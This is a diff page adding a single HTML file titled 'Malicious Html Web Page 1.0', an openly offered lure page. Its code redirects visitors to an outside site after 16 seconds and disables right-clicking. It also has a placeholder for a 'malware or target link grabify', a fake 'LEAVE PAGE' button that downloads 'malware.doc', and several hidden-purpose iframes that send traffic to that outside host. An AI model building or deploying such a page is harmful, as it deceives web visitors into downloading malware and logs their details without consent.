File tree 1 file changed +34
-0
lines changed
1 file changed +34
-0
lines changed Original file line number Diff line number Diff line change
1
+ <!DOCTYPE html>
2
+ < html >
3
+ < head >
4
+ <!--redirects users traffic to target after 16 seconds-->
5
+ < meta http-equiv ="refresh " content ="16;http://www.sterbenos.wixsite.com/hack " />
6
+ < title > Malicious Html Web Page 1.0</ title >
7
+ </ head >
8
+ <!—background—>
9
+ < body style ="background-color:black; ">
10
+ <!--disable right clicking page oncontext menu-->
11
+ < body oncontextmenu ="return false; ">
12
+ < body >
13
+ < p style ="color:red;font-size:50; ">
14
+ < strong > HELLO USER!!</
15
+ strong >
16
+ <!—malware link goes here—>
17
+ < a href ="http://google.com/ "> Malware or target link grabify ect.</ a >
18
+ <!-- leave button that will download malware file-->
19
+ < form method ="get " action ="malware.doc ">
20
+ < button type ="submit "> LEAVE PAGE</ button >
21
+ </ form >
22
+
23
+ <!--using iframes to send traffic to target site, you could add alot more iframes-->
24
+ < iframe frameborder ="1 " width ="100 " height ="100 " src ="http://www.sterbenos.wixsite.com/hack "> </ iframe >
25
+ < iframe frameborder ="1 " width ="100 " height ="100 " src ="http://www.sterbenos.wixsite.com/hack "> </ iframe >
26
+ < iframe frameborder ="1 " width ="100 " height ="100 " src ="http://www.sterbenos.wixsite.com/hack "> </ iframe >
27
+ < iframe frameborder ="1 " width ="100 " height ="100 " src ="http://www.sterbenos.wixsite.com/hack "> </ iframe >
28
+ < iframe frameborder ="1 " width ="100 " height ="100 " src ="http://www.sterbenos.wixsite.com/hack "> </ iframe >
29
+
30
+
31
+
32
+
33
+ </ body >
34
+ </ html >
You can’t perform that action at this time.
0 commit comments